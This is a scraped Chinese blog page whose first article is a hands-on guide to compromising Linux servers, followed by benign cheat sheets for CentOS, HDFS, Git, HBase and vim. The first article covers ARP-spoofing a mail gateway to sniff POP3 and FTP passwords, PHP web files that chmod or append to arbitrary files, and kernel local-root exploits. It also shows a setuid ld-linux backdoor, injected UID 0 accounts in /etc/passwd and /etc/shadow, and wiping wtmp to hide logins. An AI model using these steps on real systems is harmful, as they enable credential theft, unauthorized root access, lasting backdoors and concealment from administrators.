http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0 tar zxvf libpcap-0.8.1.tar.gz cd libpcap-0.8.1 ./configure make make install 重新编译arpsniffer.c gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet 这次没报错,编译成功。 ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254 下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77) ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110 在另一个登录里面用tcpdump监听下 tcpdump -i eth0 host 192.168.0.11 发现有数据,把监听的数据存在文件里面: tcpdump -i eth0 host 172.16.0.12 -w pop.txt 10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。 下面我们就可以用linsniffer监听我们想要的用户名和密码了。 先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下: if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==80) p=1; /* http */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ [root@bbs111 root]# gcc -o linsniffer linsniffer.c In file included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead! 不用管警告,直接运行编译后的linsniffer即可。 [root@bbs111 root]# ./linsniffer 用户名和密码都自动存到了tcp.log下。 3、利用跨站代码 linux不提权跨目录访问的代码 linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。 代码如下: $path = stripslashes($_GET['path']); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permission editable file or directory. Permission to write; ?> 把上面代码保存为tmdsb.PHP 然后访问http://www.tmdsb.com/tmdsb.php?path=../../要跨的目录/index.php 这里的index.PHP是要修改权限的文件。 收集的另一个exp: 把下面的代码保存为exp.PHP 代码: @$filename = stripslashes($_POST['filename']); @$mess = stripslashes($_POST['mess']); $fp = @fopen({$_POST['filename']}, 'a'); @fputs($fp,$mess ); @fclose($fp); ?> 4.2.618最终Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功 udev提权 换了个udev提权,适用于内核范围为2.6.*。 还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。 chmod +x pwnkernel.c chmod +x wunderbar_emporium.sh chmod +x exploit.c 之后执行溢出./w* 成功溢出,root权限。 之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。(useradd -u 0 -o "username") 依次输入命令 cd /tmp sh-3.1# ls /lib/ld-linux* /lib/ld-linux.so.2 sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven sh-3.1# ls -l .str1ven -rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven sh-3.1# chmod +s .str1ven sh-3.1# ls -l .str1ven -rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven 成功建立一个后门,退出root,执行./.str1ven `which whoami`,又成功获取root权限~~ cat /etc/passwd 查看linux用户 cat /etc/shadow 查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 ifconfig 查看本机ip信息 cat /etc/resolv.conf 查看DNS信息 bash -i 在反弹的shell中使用可以直观显示命令 bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以 Root登陆时,你的prompt会变成bash#。 系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。 echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward, vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理! netstat -an |grep LISTEN |grep :80 查看端口 service --status-all | grep running service --status-all | grep http 查看运行服务 lsb_release -a 查看系统版本 重启ssh服务 : /usr/sbin/sshd stop/ usr/sbin/sshd start ssd_config文件里 PasswordAuthentication no, 将其改为 PasswordAuthentication yes 远程ssh才可登录 否则显示Access denied 其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开. su的菜鸟用法 先chomod 777 /etc/passwd 然后修改bin用户的gid和uid为0 然后passwd设置bin的密码 然后cp /bin/bash /sbin/nologin 然后su的时候su - bin就可以到rootshell了。 这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。 还可以这样 sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd gcc prtcl2.c –o local –static –Wall echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow 清空last记录 cp /dev/null /var/log/wtmp ----- dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的 /etc/init.d/ssh start 开22端口 /etc/ssh/sshd_config SSH服务配置文件 文章摘自微信公众号:计算机与网络安全
2018-02-03
优秀的个人博客,低调大师

centos常用命令和安装命令

安装 yum install screen yum install wget yum install pcre yum install openssl* 查看/编辑 网络配置vi /etc/sysconfig/network-scripts/ifcfg-eno16777736 重启网络配置service network restart 切换用户 su root 在Centos中yum安装和卸载软件的使用方法 安装方法 安装一个软件时 yum -y install httpd 安装多个相类似的软件时 yum -y install httpd* 安装多个非类似软件时 yum -y install httpd php php-gd mysql 卸载一个软件时 yum -y remove httpd 卸载多个相类似的软件时 yum -y remove httpd* 卸载多个非类似软件时 yum -y remove httpd php php-gd mysql 查看端口是否开启 netstat -an |grep 443 netstat -lntp 查看监听(Listen)的端口 netstat -antp #查看所有建立的TCP连接 停掉防火墙 service iptables stop 查看是否安装 whereis nginx 执行命令找到nginx路径 ps aux | grep nginx 显示进程 ps -ef |grep nginx 杀死进程 kill -HUP 主进程号或进程号文件路径 kill -SIGUSR2 PID # top //找出CPU使用率高的进程PID # strace -p PID //跟踪进程 # ll /proc/PID/fd //查看该进程在处理哪些文件 将有可疑的PHP代码修改之,如:file_get_contents没有设置超时时间。 启动ngin cd usr/local/nginx/sbin ./nginx 重启ngin cd /usr/local/nginx/sbin ./nginx -s reload 强制停止 pkill -9 nginx 验证ngin配置文件正确 cd /usr/local/nginx/sbin ./nginx -t 查看服务器进程使用情况 top shift+p 按cpu排序 shift+m 按内存排序 查看所有进程 ps -ef 查看服务器版本 lsb_release -a cat /etc/redhat-release cat /etc/issue 登录mysql mysql -u root -p linux 所有配置文件目录 在etc文件 /bin/systemctl start iptables.service 开启防火墙 可以实时的得到新追加到文件中的信息,常用来跟踪日志文 tail -f 17_05_05.log Linux下检查是否安装过某软件包 1、rpm包安装的,可以用 rpm -qa 看到,如果要查找某软件包是否安装,用 rpm -qa | grep "软件或者包的名字" 2、以deb包安装的,可以用 dpkg -l 看到。如果是查找指定软件包,用 dpkg -l | grep "软件或者包的名字" 3、yum方法安装的,可以用 yum list installed 查找,如果是查找指定包,用 yum list installed | grep "软件名或者包名"mysql 远程访问不行解决方法 Host is not allowed to connect to this MySQL server 如果你想连接你的mysql的时候发生这个错误: ERROR 1130: Host ‘192.168.1.3’ is not allowed to connect to this MySQL server 解决方法:1。 改表法。可能是你的帐号不允许从远程登陆,只能在localhost。这个时候只要在localhost的那台电脑,登入mysql后,更改 “mysql” 数据库里的 “user” 表里的 “host” 项,从”localhost”改称”%” mysql -u root -pvmwaremysql>use mysql;mysql>update user set host = ‘%’ where user = ‘root';mysql>select host, user from user; 2. 授权法。例如,你想myuser使用mypassword从任何主机连接到mysql服务器的话。 GRANT ALL PRIVILEGES ON *.* TO ‘myuser’@’%’ IDENTIFIED BY ‘mypassword’ WITH GRANT OPTION; 如果你想允许用户myuser从ip为192.168.1.3的主机连接到mysql服务器,并使用mypassword作为密码 GRANT ALL PRIVILEGES ON *.* TO‘root’@’192.168.1.3′IDENTIFIED BY ‘mypassword’ WITH GRANT OPTION; GRANT ALL PRIVILEGES ON *.* TO‘root’@’10.10.40.54′IDENTIFIED BY ‘123456’ WITH GRANT OPTION;
2018-01-29
优秀的个人博客,低调大师

Linux系统下开发常用命令

文件目录中查找函数和文件 find . | xargs grep func_name find -name "*.mk" | xargs grep file_name.c 持续显示某个文件内容,在当前操作窗口持续更新 tail -f boot_info.log 打开某个文件并查找关键字 less ./frame/fei/fe_nse/nse_fsm.c grep FEI_FEVFP_HEARTBEAT_SendPktProc.c ./ -r 从so中找是否编进去某个函数 nm libfeife.so | grep FE588X_HODP_TXPKT_Buf2HwBuf 1."-A" 列出符号名的时候同时显示来自哪个文件 2."-a" 列出所有符号,这将会把调试符号也列出来,默认情况下不会被列出; 3."-l",列出符号在源代码中的行号; 4."-n",根据符号的地址来排序,默认是按符号名称的字母顺序来排序的; 5."-u",只列出未定义符号; 列出so中所有函数 nm -D XXX.so objdump -tT XXX.so 查看命令使用历史记录,并用less分页显示 history | less Linux上压缩文件 tar -zcvf /tmp/etc.tar.gz /etc <==打包后,以gzip压缩 tar -jcvf /tmp/etc.tar.bz2 /etc<==打包后,以bzip2压缩 当前目录下各文件夹大小 du -h --max-depth=1 当前目录查找某字符串 grep ./ -nr "key_string" 目录下查找keystring文件 grep "key_string" ./r 文件下查找yyy关键字 cat xxx | grep yyy xxx Linux下查看操作系统是多少位的? uname -a Linux下查看操修行系统是CentOS还是Ubuntu等 lsb_release -a Linux查看物理CPU个数、核数、逻辑CPU个数 总核数 = 物理CPU个数 X 每颗物理CPU的核数 总逻辑CPU数 = 物理CPU个数 X 每颗物理CPU的核数 X 超线程数 查看物理CPU个数 cat /proc/cpuinfo| grep "physical id"| sort| uniq| wc -l 查看每个物理CPU中core的个数(即核数) cat /proc/cpuinfo| grep "cpu cores"| uniq 查看逻辑CPU的个数 cat /proc/cpuinfo| grep "processor"| wc -l 查看CPU信息(型号) cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c Linux下查看线程的资源占用情况 1 先用ps + grep找出该死的进程pid,比如 30420 2 top -H -p 30420,(top然后shift+H可以看出某个线程)所有该进程的线程都列出来了。看看哪个线程pid占用最多,然后将这个pid转换为16进制,如 44bf,注意要小写 3 执行top命令后,输入1 可查看各cpu核单独占用率,top显示的是各个核加起来的总和; 4 输入f 出现列,通过输入行前首字母,选择显示列; Linux下查看进程下所有线程的调用栈 pstack -pid (进程ID) Linux使用tcpdump抓取网络数据包 ifconfig 查看网卡名字 tcpdump [-i 网卡] -nnAX '表达式' -i:interface 监听的网卡。 -nn:表示以ip和port的方式显示来源主机和目的主机,而不是用主机名和服务。 -A:以ascii的方式显示数据包,抓取web数据时很有用。 -X:数据包将会以16进制和ascii的方式显示。 表达式:表达式有很多种,常见的有:host 主机;port 端口;src host 发包主机;dst host 收包主机。多个条件可以用and、or组合,取反可以使用!,更多的使用可以查看man 7 pcap-filter。 1、监听网卡eth0 $ tcpdump -i eth0 2、监听指定协议的数据 $ tcpdump -i eth0 -nn 'icmp' 3、监听指定的主机 $ tcpdump -i eth0 -nn 'host 192.168.1.231' $ tcpdump -i eth0 -nn 'dst host 192.168.1.231' 4、监听指定端口 $ tcpdump -i eth0 -nnA 'port 80' 5、监听指定主机和端口 $ tcpdump -i eth0 -nnA 'port 80 and src host 192.168.1.231' 6、抓包重定向使用输出在Windows上使用wireshark分析 $ tcpdump -i eth0 -nnA 'port 80' >>test.pncp Linux下反汇编 linux下objdump命令常见用法举例: objdump -x obj:以某种分类信息的形式把目标文件的数据组成输出;<可查到该文件的的所有动态库> objdump -t obj:输出目标文件的符号表() objdump -h obj:输出目标文件的所有段概括() objdump -j ./text/.data -S obj:输出指定段的信息(反汇编源代码) objdump -S obj:输出目标文件的符号表() 当gcc -g时打印更明显 objdump -j .text -Sl stack1 | more -S 尽可能反汇编出源代码,尤其当编译的时候指定了-g这种调试参数时, 效果比较明显。隐含了-d参数。 -l 用文件名和行号标注相应的目标代码,仅仅和-d、-D或者-r一起使用 使用-ld和使用-d的区别不是很大,在源码级调试的时候有用,要求 编译时使用了-g之类的调试编译选项。 -j name 仅仅显示指定section的信息 如何使用linux下objdump命令对任意一个二进制文件进行反汇编? 可以使用如下命令: objdump -D -b binary -m i386 a.bin -D表示对全部文件进行反汇编,-b表示二进制,-m表示指令集架构,a.bin就是我们要反汇编的二进制文件 objdump -m可以查看更多支持的指令集架构,如i386:x86-64,i8086等 另外上面的所有objdump命令的参数同样适用于arm-linux-objdump。 同时我们也可以指定big-endian或little-endian(-eb或-el),我们可以指定从某一个位置开始反汇编等。 objdump命令是Linux下的反汇编目标文件或者可执行文件的命令,它还有其他作用,下面以ELF格式可执行文件test为例详细介绍: objdump -f test 显示test的文件头信息 objdump -d test 反汇编test中的需要执行指令的那些section objdump -D test 与-d类似,但反汇编test中的所有section objdump -h test 显示test的Section Header信息 objdump -x test 显示test的全部Header信息 objdump -s test 除了显示test的全部Header信息,还显示他们对应的十六进制文件代码 linux 命令替换文件夹下所有文件指定字符串为 比如,要将目录/modules下面所有文件中的zhangsan都修改成lisi,这样做 sed -i "s/zhangsan/lisi/g" `grep zhangsan -rl /modules` 解释一下: -i 表示inplace edit,就地修改文件 -r 表示搜索子目录 -l 表示输出匹配的文件名 这个命令组合很强大,要注意备份文件。 Linux下查看进程下所有线程的调用栈 lsof(list open files)是一个列出当前系统打开文件的工具。在linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件。所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息,因此通过lsof工具能够查看这个列表对系统监测以及排错将是很有帮助的。 确认系统设置的最大文件句柄数 ulimit -a 统计系统中当前打开的总文件句柄数 lsof|awk '{print $2}'|wc -l 根据打开文件句柄的数量降序排列,其中第二列为进程ID: lsof|awk '{print $2}'|sort|uniq -c|sort -nr|more
2017-12-22
优秀的个人博客,低调大师

HDFS基本文件常用命令

为了每次执行hadoop的时候,不必须要前者加上hadoop的安装的绝对路径,要做的事情就是将其安装路径加入到PATH中,这样就可以直接执行hadoop命令。如下: vim /etc/profile中加入一句 export HADOOP_INSTALL=/usr/local/hadoop1.1.2 注意这里要写HADOOP_INSTALL,因为如果写HADOOP_HOME会在执行命令的时候提醒该已经deprecated 然后将其bin加入到PATH中 export PATH=$HADOOP_INSTALL/bin:$PATH 在使用hadoop命令的时候,必须要保证Hadoop服务启动了。 基本文件命令:格式为:hadoop fs -cmd <args> HDFS有一个默认的工作目录 /user/$USER,$USER就是当前登录的用户名,只有将文件放入HDFS上后,才可以运行Hadoop程序来处理它。 基本的参数如下,省略了前面的hadoop fs 注意这里的path不用加上/user/$USER,默认会自动的创建父目录 注意hadoop 2.0后,直接用hdfs dfs 替换 hadoop fs 在利用hadoop命令的时,默认的工作路径就是在/user/$USER 1. -ls path 列出path目录下的内容,包括文件名,权限,所有者,大小和修改时间。 2. -lsr path 与ls相似,但递归地显示子目录下的内容。 3. -dupath 显示path下所有文件磁盘使用情况下,用字节大小表示,文件名用完整的HDFS协议前缀表示。 4. -duspath 与-du相似,但它还显示全部文件或目录磁盘使用情况 5. -mvsrc dest 在HDFS中,将文件或目录从HDFS的源路径移动到目标路径。 6. -cpsrc dest 在HDFS中,将src文件或目录复制到dest。 7. –rmpath 删除一个文件或目录 8. –rmrpath 删除一个文件或递归删除目录 注意:这里的mv cp操作的源路径和目的路径都是在HDFS中的路径文件 9. –putlocalSrc dest 将本地文件或目录localSrc上传到HDFS中的dest路径。 10. –copyFromLocallocalSrc dest 与-put命令相同 11. –moveFromLocallocalSrc dest 将文件或目录从localSrc上传到HDFS中的dest目录,再删除本地文件或目录localSrc。 12 –get [-crc]src localDest 将文件或目录从HDFS中的src拷贝到本地文件系统localDest。 13 –getmergesrc localDest[addnl] 将在HDFS中满足路径src的文件合并到本地文件系统的一个文件localDest中。 14 –catfilename 显示文件内容到标准输出上。 15. -copyToLocal [-crc]src localDest 与-get命令相同。 16 -moveToLocal [-crc]src localDest 与-get命令相似,但拷贝结束后,删除HDFS上原文件。 17 -mkdirpath 在HDFS中创建一个名为path的目录,如果它的上级目录不存在,也会被创建,如同linux中的mkidr –p。 18 -setrep [-R] [-w]rep path 设置目标文件的复制数。 19 -touchzpath 创建一个文件。时间戳为当前时间,如果文件本就存在就失败,除非原文件长充为0。 20 -test –[ezd]path 如果路径(path)存在,返回1,长度为0(zero),或是一个目录(directory)。 21 –stat [format]path 显示文件所占块数(%b),文件名(%n),块大小(%n),复制数(%r),修改时间(%y%Y)。 22 –tail [-f]file 显示文件最后的1KB内容到标准输出。 23 –chmod [-R] [owner][:[group]]path… 递归修改时带上-R参数,mode是一个3位的8进制数,或是[augo]+/-{rwxX}。 24 –chgrp [-R]group 设置文件或目录的所有组,递归修改目录时用-R参数。 25 –helpcmd 显示cmd命令的使用信息,你需要把命令的“-”去掉 本文转自 zhao_xiao_long 51CTO博客,原文链接:http://blog.51cto.com/computerdragon/1259214
2017-11-12
优秀的个人博客,低调大师

Android Git 常用命令和规范

转载请标明出处:http://blog.csdn.net/zhaoyanjun6/article/details/70332707 本文出自【赵彦军的博客】 在 Android Studio 中要操作 Git 服务,有两种方式,它们分别是 GUI 和 命令行方式,今天就着重介绍 命令行 方式操作 Git 服务 。 首先在 Android Studio 里面找到 命令行窗口,如下图所示: 概念 git 操作流程图 专有名词了解 Workspace:工作区 Index / Stage:暂存区 Repository:仓库区(或本地仓库) Remote:远程仓库 常见命令 1、查看 Git 版本信息 git --version 结果: git version 2.11.0.windows.1 2、获取当前登录的用户 git config --global user.name 结果: zhaoyanjun 3、获取当前登录用户邮箱 git config --global user.email 4、设置当前登录用户的用户名 git config --global user.name '赵彦军' 5、设置当前登录用户的邮箱 git config --global user.email '362299465@qq.com' 6、初始化仓库 文件夹下初始化一个仓库,此时文件里会到一个.git的隐藏文件夹 git init 7、查看本地所有的分支 git branch 效果如图所示: 可以看出,我的本地有两个分支:master 分支 、zhaoyanjun 分支。 master 分支 显示的是绿色,左侧有一个 * 号,表示,当前我们在 master 分支上操作。 8、查看本地和远程所有分支 git branch -a 效果如图所示: 可以看出,本地有两个分支(master、zhaoyanjun),红色的记录有4条,代表4条远程分支(laijian、master、zhaoyanjun、zhiqiang)。 9、查看远程所有分支 git branch -r 10、创建分支 创建 dev 分支。 git branch dev 11、切换分支 切换 dev 分支为当前分支 git checkout dev 12、创建并切换分支 创建并切换 dev 分支。相当于 git branch dev 和 git checkout dev 的合集。 git checkout -b dev 13、添加文件 把 当前根目录中的 loader1.png 添加在暂存区。 add 后面需要写 文件的相对路径。 git add loader1.png 把 image 目录下的 loader1.png 图片添加到暂存区 git add image/loader1.png 在 Android Studio 很多层级的目录文件中,如何获取文件的路径: 14、批量添加文件 git add -A 15、查看log git log 退出 log q 删除相关 删除本地仓库的分支 git branch -d dev 删除本地仓库的 dev 分支 删除远程仓库的分支 git push origin :dev 删除远程的 dev 分支 删除本地的一个文件 git rm 文件名 拉取更新 拉去远程分支,更新到本地 git pull pull 使用 –rebase参数 表示把你的本地当前分支里的每个提交(commit)取消掉,并且把它们临时 保存为补丁(patch)(这些补丁放到”.git/rebase”目录中),然后把本地当前分支更新 为最新的”origin”分支,最后把保存的这些补丁应用到本地当前分支上。 git pull --rebase 提交相关 提交文件到分支 git commit -a -m '修复一个bug' push 到远程 master 分支 git push origin master 合并分支 合并本地 dev 分支到当前分支 git merge dev 合并远程 dev 分支到当前分支 git merge origin/dev Diff 相关 比较的是暂存区和工作区的差异 git diff 比较的是暂存区和历史区的差异 git diff --cached 比较的是历史区和工作区的差异(修改) git diff master Tag 相关 查看所有 tag git tag 删除某一 tag git tag –d tag名字 查看某一标签 git show tag名字 给当前分支打标签 git tag 标签名 为历史版本打标签 git tag 标签名 该版本ID 回退 reset 相关 reset命令有3种方式: git reset –mixed: 此为默认方式,不带任何参数的git reset,即时这种方式,它回退到某个版本,只保留源码,回退commit和index信息 git reset –soft: 回退到某个版本,只回退了commit的信息,不会恢复到index file一级。如果还要提交,直接commit即可 3:git reset –hard: 彻底回退到某个版本,本地的源码也会变为上一个版本的内容 1、 将本地的状态回退到和远程一样 git reset --hard origin/master 2、将暂存区里面的修改清空 , 回退到上一次提交的记录 git reset --hard 3、将本地的状态回退到 某个版本 git reset --hard 5230bb6 将本地状态回退到 5230bb6 这次的提交 Git commit 日志规范 一般情况下,在 commit 的时候,是要求必须写 commit 日志,否则不能 commit . 那么 commit 日志也是需要规范的。日志格式一般为: type( scope ): subject 空行 body 空行 footer type(必需)、scope(可选)和subject(必需)。 type 用于说明 commit 的类别,只允许使用下面7个标识。 feat:新功能(feature) fix:修补bug docs:文档(documentation) style: 格式(不影响代码运行的变动) refactor:重构(即不是新增功能,也不是修改bug的代码变动) test:增加测试 chore:构建过程或辅助工具的变动 如果type为 feat 和 fix ,则该 commit 将肯定出现在 Change log 之中。其他情况(docs、chore、style、refactor、test)由你决定,要不要放入 Change log,建议是不要。 scope scope用于说明 commit 影响的范围,比如数据层、控制层、视图层等等,视项目不同而不同。一般有三个可以选择。 all :表示影响面大 ,如修改了网络框架 会对整个程序产生影响 loation: 表示影响小,某个小小的功能 module:表示会影响某个模块 如登录模块、首页模块 、用户管理模块等等 subject subject是 commit 目的的简短描述,不超过50个字符。 以动词开头,使用第一人称现在时,比如change,而不是changed或changes 第一个字母小写 结尾不加句号(.) body 具体的修改信息 应该尽量详细 footer 放置写备注啥的,如果是 bug ,可以把bug id放入 效果图如下图所示: 参考资料 http://www.ruanyifeng.com/blog/2015/12/git-cheat-sheet.html
2017-04-21
优秀的个人博客,低调大师

HBase常用命令汇总——综述(一)

hbase(main):009:0> help HBase Shell, version 1.2.4, r67592f3d062743907f8c5ae00dbbe1ae4f69e5af, Tue Oct 25 18:10:20 CDT 2016 Type 'help "COMMAND"', (e.g. 'help "get"' -- the quotes are necessary) for help on a specific command. Commands are grouped. Type 'help "COMMAND_GROUP"', (e.g. 'help "general"') for help on a command group. COMMAND GROUPS: #常规命令 Group name: general Commands: status, table_help, version, whoami Group name: ddl Commands: alter, alter_async, alter_status, create, describe, disable, disable_all, drop, drop_all, enable, enable_all, exists, get_table, is_disabled, is_enabled, list, locate_region, show_filters Group name: namespace Commands: alter_namespace, create_namespace, describe_namespace, drop_namespace, list_namespace, list_namespace_tables Group name: dml Commands: append, count, delete, deleteall, get, get_counter, get_splits, incr, put, scan, truncate, truncate_preserve Group name: tools Commands: assign, balance_switch, balancer, balancer_enabled, catalogjanitor_enabled, catalogjanitor_run, catalogjanitor_switch, close_region, compact, compact_rs, flush, major_compact, merge_region, move, normalize, normalizer_enabled, normalizer_switch, split, trace, unassign, wal_roll, zk_dump #复制命令 Group name: replication Commands: add_peer, append_peer_tableCFs, disable_peer, disable_table_replication, enable_peer, enable_table_replication, list_peers, list_replicated_tables, remove_peer, remove_peer_tableCFs, set_peer_tableCFs, show_peer_tableCFs Group name: snapshots Commands: clone_snapshot, delete_all_snapshot, delete_snapshot, list_snapshots, restore_snapshot, snapshot Group name: configuration Commands: update_all_config, update_config Group name: quotas Commands: list_quotas, set_quota #安全命令 Group name: security Commands: grant, list_security_capabilities, revoke, user_permission Group name: procedures Commands: abort_procedure, list_procedures Group name: visibility labels Commands: add_labels, clear_auths, get_auths, list_labels, set_auths, set_visibility #常规命令 #1,集群状态命令 hbase(main):001:0> status 1 active master, 0 backup masters, 1 servers, 1 dead, 4.0000 average load #该集群有1台regin server,1个master,没有死掉的master,平均每台RegionServer上有4.0000个Region #2,HBase版本命令 hbase(main):002:0> version 1.2.4, r67592f3d062743907f8c5ae00dbbe1ae4f69e5af, Tue Oct 25 18:10:20 CDT 2016 #版本号+修订版本号+编译HBase的时间 #DDL命令 #数据定义语言命令,用于管理表相关的操作,包括创建表,修改表,上线和下线表,删除表,罗列表等操作 #DML命令 数据操作语言命令,用户数据写入,删除,修改,查询,清空等操作 #Tools 用于HBase集群管理和调优;涵盖了合并,分裂,负载均衡,日志回滚,Region分配和移动以及Zookeeper信息查看等方面; #复制命令 复制的管理,可以添加,删除,启动和停止复制功能相关操作; #安全命令 grant,revoke,user_permission
2016-12-08
优秀的个人博客,低调大师

HDFS常用命令(方便大家记忆版)

1. 文件操作 (1) 列出HDFS下的文件 /usr/local/hadoop$bin/hadoop dfs -ls (2) 列出HDFS文件下名为in的文档中的文件 /usr/local/hadoop$bin/hadoop dfs -ls in (3) 上传文件 将hadoop目录下的test1文件上传到HDFS上并重命名为test: /usr/local/hadoop$bin/hadoop dfs -put test1 test (4) 文件被复制到本地系统中 将HDFS中的in文件复制到本地系统并命名为getin: /usr/local/hadoop$bin/hadoop dfs -get in getin (5) 删除文档 删除HDFS下名为out的文档: /usr/local/hadoop$bin/hadoop dfs -rmr out (6) 查看文件 查看HDFS下in文件中的内容: /usr/local/hadoop$bin/hadoop dfs -cat in/* (7) 建立目录 /usr/local/hadoop$bin/hadoop dfs -mkdir /user/hadoop/examples(目录/目录名) 只能一级一级的建目录。 (8) 复制文件 /usr/local/hadoop$bin/hadoop dfs -copyFromLocal 源路径 路径 (9)通过Hadoop命令把两个文件的内容合并起来 hdfs dfs -getmerge 位于hdfs中的原文件(里面有多个文件) 合并后的文件名 例如:hdfs dfs -getmerge hdfs://Master:9000/data/SogouResult.txt CombinedResult 注:合并后的文件位于当前目录,不在hdfs中,是本地文件 2. 管理与更新 (1) 执行基本信息 查看HDFS的基本统计信息: /usr/local/hadoop$bin/hadoop dfsadmin -report (2) 退出安全模式 NameNode在启动时会自动进入安全模式。安全模式是NameNode的一种状态,在这个阶段,文件系统不允许有任何修改。 系统显示Name node in safe mode,说明系统正处于安全模式,这时只需要等待十几秒即可,也可通过下面的命令退出安全模式: /usr/local/hadoop$bin/hadoop dfsadmin -safemode leave (3) 进入安全模式 在必要情况下,可以通过以下命令把HDFS置于安全模式: /usr/local/hadoop$bin/hadoop dfsadmin -safemode enter (4)节点添加 添加一个新的DataNode节点,先在新加节点上安装好Hadoop,要和NameNode使用相同的配置(可以直接从NameNode复制),修改$HADOOP_HOME/conf/master文件,加入NameNode主机名。然后在NameNode节点上修改$HADOOP_HOME/conf/slaves文件,加入新节点名,再建立新加节点无密码的SSH连接,运行启动命令为: /usr/local/hadoop$bin/start-all.sh (5)负载均衡 HDFS的数据在各个DataNode中的分布可能很不均匀,尤其是在DataNode节点出现故障或新增DataNode节点时。新增数据块时NameNode对DataNode节点的选择策略也有可能导致数据块分布不均匀。用户可以使用命令重新平衡DataNode上的数据块的分布: /usr/local/hadoop$bin/start-balancer.sh
2018-08-06
优秀的个人博客,低调大师

Linux下vim的常用命令总结

vim按d表示剪切 按dd剪切一行 vim命令:命令模式 /关键字 n继续向下查找 vim的多行注释: 1.按ctrl + v进入 visual block模式 2.按上下选中要注释的行 3.按大写字母I,再插入注释符,例如// 4.按两下esc 5.按ctrl + v进入 visual block模式,按箭头选中要取消的// 6.按d删除 比较两个文件: vimdiff 文件1 文件2 vim配置行号: /etc/vimrc 添加set number,无行号set nonumber ctags:扫描指定的源文件,找出其中所包含的语法元素,并将找到的相关内容记录下来 安装ctags yum install ctags ctags --list-languages 支持的语言 ctags -R 生成个tags文件保存函数信息 /etc/vimrc 添加 set tags=tags set autochdir 使用:ctrl+]跳转到 ctrl+t跳转回 vimtutor是vim的教程 vim的三种模式:命令模式,编辑模式,末行模式 vim命令: ZZ 保存退出 gg=G 代码格式化 0 移到到行首 $ 移到到行尾 gg 移到到文件头 G 移到到文件尾 数字G 行跳转 dD 全部删除 d0 删除光标前的 dd 删除光标所在行 d$ 删除光标后的 u 撤销 ctrl+r 前进 yy 复制一行 数字yy 复制多行 P 大P粘贴 R 大R替换 ctrl+f下一页,ctrl+b上一页
2018-06-15

资源下载

更多资源
Mario

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长,特征是大鼻子、头戴帽子、身穿背带裤,还留着胡子。与他的双胞胎兄弟路易基一起,长年担任任天堂的招牌角色。

时间: 2025-12-12 大小: 211.28KB 下载: 54次
腾讯云软件源

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题,腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构,目前腾讯云软件源站支持公网访问和内网访问。

时间: 2025-12-13 大小: 1MB 下载: 0次
Nacos

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称,一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

时间: 2025-12-13 大小: 189MB 下载: 0次
Spring

Spring

